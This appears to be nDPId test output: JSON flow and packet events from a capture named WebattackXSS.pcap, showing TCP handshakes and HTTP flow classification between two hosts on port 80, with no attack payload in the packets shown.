-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347442626,"flow_last_seen":1499347447735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5020,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347569321,"flow_last_seen":1499347569321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347569321,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5020,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":1,"flow_last_seen":1499347569321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347569321,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8g25AAD4GQmKsEAABwKgKMuTeAFCWQ7AYAAAAAKACchD+xwAAAgQFtAQCCAoBOzN2AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5021,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":2,"flow_last_seen":1499347569321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347569321,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5N7q6xnjlkOwGaAScSDyBwAAAgQFtAQCCAoD5QTrATszdgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5022,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":3,"flow_last_seen":1499347569321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347569321,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0g29AAD4GQmmsEAABwKgKMuTeAFCWQ7AZ6usZ5IAQAOWRDwAAAQEICgE7M3YD5QTr"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347570571,"flow_last_seen":1499347570571,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347570571,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":1,"flow_last_seen":1499347570571,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347570571,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8l0FAAD4GLo+sEAABwKgKMuTsAFD4v6PuAAAAAKACchCnLgAAAgQFtAQCCAoBOzSvAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":2,"flow_last_seen":1499347570571,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347570571,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5Ow6nDyd+L+j76AScSAmywAAAgQFtAQCCAoD5QYkATs0rwEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5034,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":3,"flow_last_seen":1499347570572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347570572,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0l0JAAD4GLpasEAABwKgKMuTsAFD4v6PvOpw8noAQAOXF0gAAAQEICgE7NK8D5QYk"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347573065,"flow_last_seen":1499347573065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347573065,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":1,"flow_last_seen":1499347573065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347573065,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8STJAAD4GfJ6sEAABwKgKMuUGAFCilH4sAAAAAKACchAgkwAAAgQFtAQCCAoBOzceAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5054,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":2,"flow_last_seen":1499347573065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347573065,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5Qbzm\/YPopR+LaAScSArTgAAAgQFtAQCCAoD5QiTATs3HgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5055,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":3,"flow_last_seen":1499347573066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347573066,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0STNAAD4GfKWsEAABwKgKMuUGAFCilH4t85v2EIAQAOXKVQAAAQEICgE7Nx4D5QiT"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347574366,"flow_last_seen":1499347574366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347574366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58650,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":1,"flow_last_seen":1499347574366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347574366,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8umZAAD4GC2qsEAABwKgKMuUaAFCmeIIFAAAAAKACchAXfQAAAgQFtAQCCAoBOzhjAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":2,"flow_last_seen":1499347574366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347574366,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5RoJ5n+MpniCBqAScSCBKwAAAgQFtAQCCAoD5QnZATs4YwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5064,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":3,"flow_last_seen":1499347574367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347574367,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0umdAAD4GC3GsEAABwKgKMuUaAFCmeIIGCeZ\/jYAQAOUgMgAAAQEICgE7OGQD5QnZ"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347575652,"flow_last_seen":1499347575652,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347575652,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":1,"flow_last_seen":1499347575652,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347575652,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XdZAAD4GZ\/qsEAABwKgKMuUoAFDuGWRzAAAAAKACchDsHQAAAgQFtAQCCAoBOzmlAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5075,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":2,"flow_last_seen":1499347575652,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347575652,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5Sh6374H7hlkdKAScSClFgAAAgQFtAQCCAoD5QsaATs5pQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5076,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":3,"flow_last_seen":1499347575653,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347575653,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XddAAD4GaAGsEAABwKgKMuUoAFDuGWR0et++CIAQAOVEHgAAAQEICgE7OaUD5Qsa"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347445158,"flow_last_seen":1499347450735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57264,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347445158,"flow_last_seen":1499347450735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57264,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347446419,"flow_last_seen":1499347451735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57278,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347446419,"flow_last_seen":1499347451735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347447671,"flow_last_seen":1499347452736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57292,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347447671,"flow_last_seen":1499347452736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347450180,"flow_last_seen":1499347455736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57318,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347450180,"flow_last_seen":1499347455736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347451427,"flow_last_seen":1499347456736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57332,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347451427,"flow_last_seen":1499347456736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347452731,"flow_last_seen":1499347457736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57346,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347452731,"flow_last_seen":1499347457736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5092,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347578164,"flow_last_seen":1499347578164,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347578164,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58690,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5092,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":1,"flow_last_seen":1499347578164,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347578164,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86A1AAD4G3cKsEAABwKgKMuVCAFCbVdQUAAAAAKACchDMsgAAAgQFtAQCCAoBOzwZAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5093,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":2,"flow_last_seen":1499347578164,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347578164,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5UJIGXyrm1XUFaAScSD3WQAAAgQFtAQCCAoD5Q2OATs8GQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5095,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":3,"flow_last_seen":1499347578165,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347578165,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06A5AAD4G3cmsEAABwKgKMuVCAFCbVdQVSBl8rIAQAOWWYQAAAQEICgE7PBkD5Q2O"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5104,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347579405,"flow_last_seen":1499347579405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347579405,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58704,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5104,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":1,"flow_last_seen":1499347579405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347579405,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8mitAAD4GK6WsEAABwKgKMuVQAFAuJKdkAAAAAKACchBlUAAAAgQFtAQCCAoBOz1PAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5105,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":2,"flow_last_seen":1499347579406,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347579406,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5VD8Ip+YLiSnZaAScSC3ygAAAgQFtAQCCAoD5Q7EATs9TwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5106,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":3,"flow_last_seen":1499347579406,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347579406,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0mixAAD4GK6ysEAABwKgKMuVQAFAuJKdl\/CKfmYAQAOVW0gAAAQEICgE7PU8D5Q7E"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347580693,"flow_last_seen":1499347580693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347580693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":1,"flow_last_seen":1499347580693,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347580693,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Ma5AAD4GlCKsEAABwKgKMuVeAFCEtA8\/AAAAAKACchCllQAAAgQFtAQCCAoBOz6RAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5118,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":2,"flow_last_seen":1499347580694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347580694,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5V5F9x9ShLQPQKAScSAtQAAAAgQFtAQCCAoD5RAGATs+kQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5120,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":3,"flow_last_seen":1499347580694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347580694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Ma9AAD4GlCmsEAABwKgKMuVeAFCEtA9ARfcfU4AQAOXMRwAAAQEICgE7PpED5RAG"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347583209,"flow_last_seen":1499347583209,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347583209,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58744,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":1,"flow_last_seen":1499347583209,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347583209,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8hK5AAD4GQSKsEAABwKgKMuV4AFAxSsWoAAAAAKACchBABwAAAgQFtAQCCAoBO0EGAAAAAAEDAwc="} 
